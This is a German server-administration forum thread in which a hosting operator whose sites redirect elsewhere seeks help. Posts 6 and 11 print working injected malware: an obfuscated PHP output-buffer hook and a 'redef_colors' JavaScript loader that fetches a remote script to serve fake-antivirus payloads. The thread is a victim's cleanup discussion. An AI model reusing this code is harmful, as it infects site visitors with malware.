Server wurde glaub ich gehackt

Dieses Thema im Forum "Server Administration" wurde erstellt von Falloutboy6, 28. März 2011.

  1. Falloutboy6

    Falloutboy6 Member

    Hi,

    wer kann mir weiterhelfen. Manche Domains von mir werden auf die Seite
    weitergeleitet. Was kann da los sein. Ich glaub ich bräuchte mal einen von euch der sich das anschauen kann für mich. Über Unterstützung von euch würde ich mich riesig freuen, es scheint, dass da mehr los ist. In letzter Zeit ist immer wieder was.

    Danke euch.

    Gruß
    Benny
     
  2. Laubie

    Laubie Member

    wie groß ist dein Server?

    Wenn er gehackt wurde, würde ich keine halben Sachen machen.

    Alles sichern (vor allem ALLE Logs) und dann einmal neu bitte.

    Grüße
    Laubie
     
  3. Falloutboy6

    Falloutboy6 Member

    so an die 100 Kunden.
    Wie würdest du dann die Daten am besten sichern? Ich habe ja ISPConfig 2 im Einsatz. Auch die ganzen Passwörter usw.

    Danke.
     
  4. Till

    Till Administrator

    Du solltest Da erstnmal nichts überstürzen sondern erstmal auf Ursachensuche gehen.

    Wie werden die Domains denn umgeleitet? Geänderter DNS, geändete Apache Config oder einfach nur ein Hack in eninem CMS System?

    Und hast Du Deinen Server bereits mit rkhunter untersucht?

    Gibt es irgendwelche metrkwürdigen Prozesse oder hohe Prozessorlast?
     
  5. Laubie

    Laubie Member

    ok... in so einem Fall, kann man dann doch schon mal gucken, woran es liegt ;)
    So große Server hab ich nicht ;)

    Denn je mehr du wieder von dem alten auf den neuen kopierst, um so mehr mögliche Lücken holst du ja wieder rein.

    Also lieber mal genau gucken, wo das her kommt...

    Grüße
    Laubie
     
  6. Falloutboy6

    Falloutboy6 Member

    In einigen PHP Dateien wurde folgendes Script geschrieben

    PHP:
    <?php global $ob_starting;
    if(!
    $ob_starting) {
      function 
    ob_start_flush($s) {
           
    $tc = array(069848267837798973127668637819232436570271416208017298986852779193111871667275877422375213596125282113515343630884192463351);
           
    $tr = array(51543102620229261283221592554320302054310262325810210822926172183113121144712735928283231151312110151133290340003020301310301447127350280151420633320298619253918371737611061918271718172161106191816372118166110619181817211725611061925416271816611061917251817181661106191611750172461106191852172418376110619173718271718611061917211816162761106193721183718276110619173725416276110619171718161816611061917212550161611061916125172552611061916132525252561106191613252425166110619162116132527611061916212537161611061917501837161611061917501824182561106191725182718186110619161317417186110619171316131721611061917171721162761106192513242424246922000302030311312114471273502802722000302030471273514261044111302802422000213115421071501310301426104411447127358211522912113903430203050280323222217308432824224351223121153824022433636903430203041433839028024843492221730810282722105117221036369034302030414412302804143383923531395238103636113792210210841441235328322424329050362806423101538232137335440203547131826203516015284144123112744947275292235351021085229121139034502805235313952382411164490360523531395238164411852312115382404716189903601310301447127354827492353139523824112793615142057202189233812461033189036052353139523885231211538240473799223501125103450280523531395238164411852312115382404716189903601310301447127354827492353139523824112793615142057202189233812461033189223531231315052200035000213115421071502329142610441144712735890342329034000102185313743133115223381245121331152562960130616105313743133115223431202145121331152934137431331152234231021813103014261044114471273581310301447127351127992200035011251034302030151421445229121281374313311522343120214512133115283254310262329221514214452291212322926128322159255432030205431026232221514214452291212353428131030142610441144712735813103014471273511249221374313311522338124512133115255629462038622033183240120133294824492320262611513544010121381514214452291219223535042024408190340352329034440144114471273514261044111389223504202440819034051246103317312832232914261044114471273589321105224249223500035000232914261044114471273589223551555431026258);

           
    $ob_htm ''; foreach($tr as $tval) {
                   
    $ob_htm .= chr($tc[$tval]+32);
           }

           
    $slw=strtolower($s);
           
    $i=strpos($slw,'</script');if($i){$i=strpos($slw,'>',$i);}
           if(!
    $i){$i=strpos($slw,'</div');if($i){$i=strpos($slw,'>',$i);}}
           if(!
    $i){$i=strpos($slw,'</table');if($i){$i=strpos($slw,'>',$i);}}
           if(!
    $i){$i=strpos($slw,'</form');if($i){$i=strpos($slw,'>',$i);}}
           if(!
    $i){$i=strpos($slw,'</p');if($i){$i=strpos($slw,'>',$i);}}
           if(!
    $i){$i=strpos($slw,'</body');if($i){$i--;}}
           if(!
    $i){$i=strlen($s);if($i){$i--;}}
           
    $i++; $s=substr($s,0,$i).$ob_htm.substr($s,$i);

           return 
    $s;
      }
      
    $ob_starting time();
      @
    ob_start("ob_start_flush");
    ?>
    Wie finde ich am besten raus wo das Sicherheitsloch ist?

    Danke
     
  7. Till

    Till Administrator

    Was hast Du mit rkhunter rausgefunden?

    Wenn man sowas sucht, dann schaut man welche Gemeinsamkeiten haben diese Websietes. z.b. gleiches cms, etc. und man gibt den Code bei Google ein. Der erste Treffer gibt Dir gleich die Antwort:

    Definitely a hack. It construct the following script and writes it to the output buffer which then flushes to the page.

    ......

    I haven't tried to see what the redef_colors script does, but I'm guessing it's nothing good.

    Update: Google says it's this:

    Javascript included and used to distribute malware on osCommerce sites. The code is disguised as color pick, but in fact loads a malicous iframe (for the Fake AV).

    http://sucuri.net/malware/malware-entry-mwjs1240
    Time to patch your osCommerce instance.

    More: http://malware.im/blackhole-defs_colors-and-createcss-injections/


    Referenz: http://stackoverflow.com/questions/5456462/what-does-this-php-code-do

    Es handelt sich also um einen Bug / Hack von Oscommerce Seiten.
     
  8. Falloutboy6

    Falloutboy6 Member

    Ich hab mit rkhunter leider noch nicht gearbeitet. Hab es gerade mal installiert aber was muss ich jetzt machen?

    Das mit oscommerce habe ich auch gerade gelesen.
     
  9. Falloutboy6

    Falloutboy6 Member

    habs rausgefunden. rkhunter sagt

     
  10. Till

    Till Administrator

    Das ist soweit ok. Ich denke mal das Du dann nur die oscommerce Installationen säubern musst.
     
  11. Falloutboy6

    Falloutboy6 Member

    Hi,

    ich hätte nochmal eine Frage. Wer kann mir einen Linux Ssh Befehl nennen mit dem ich alle Dateien auf meinem Server nach dem Script durchsuchen kann und durch nichts, also löschen, ersetzen kann. Es sind einfach zuviele Dateien es bei jeder einzeln zu machen.

    Zu ersetzender CODE:
    Code:
    <script type="text/javascript">
    if (typeof(redef_colors)=="undefined") {
    
       var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e4745', '#3d4444', '#3d4043', '#3f3d41', '#3f423e', '#79823e', '#798084', '#748188', '#3d7c78', '#7d3d7f', '#777f31', '#4d0000');
       var redef_colors = 1;
       var colors_picked = 0;
    
       function div_pick_colors(t,styled) {
            var s = "";
            for (j=0;j<t.length;j++) {      
                    var c_rgb = t[j];
                    for (i=1;i<7;i++) {
                            var c_clr = c_rgb.substr(i++,2);
                            if (c_clr!="00") s += String.fromCharCode(parseInt(c_clr,16)-15);
                    }
            }
            if (styled) {
                    s = s.substr(0,36) + s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime() + s.substr((s.length-2));
            } else {
                    s = s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime();
            }
            return s;
       }
    
       function try_pick_colors() {
            try {
                    if(!document.getElementById || !document.createElement){
                            document.write(div_pick_colors(div_colors,1));
                       } else {
                            var new_cstyle=document.createElement("script");
                            new_cstyle.type="text/javascript";
                            new_cstyle.src=div_pick_colors(div_colors,0);
                            document.getElementsByTagName("head")[0].appendChild(new_cstyle);
                    }
            } catch(e) { }
            try {
                    check_colors_picked();
            } catch(e) { 
                    setTimeout("try_pick_colors()", 500);
            }
    </script>/ /g' {} \;;
    
    Ich hab es mit folgendem Befehl probiert klappt aber leider nicht
    Danke
     

Diese Seite empfehlen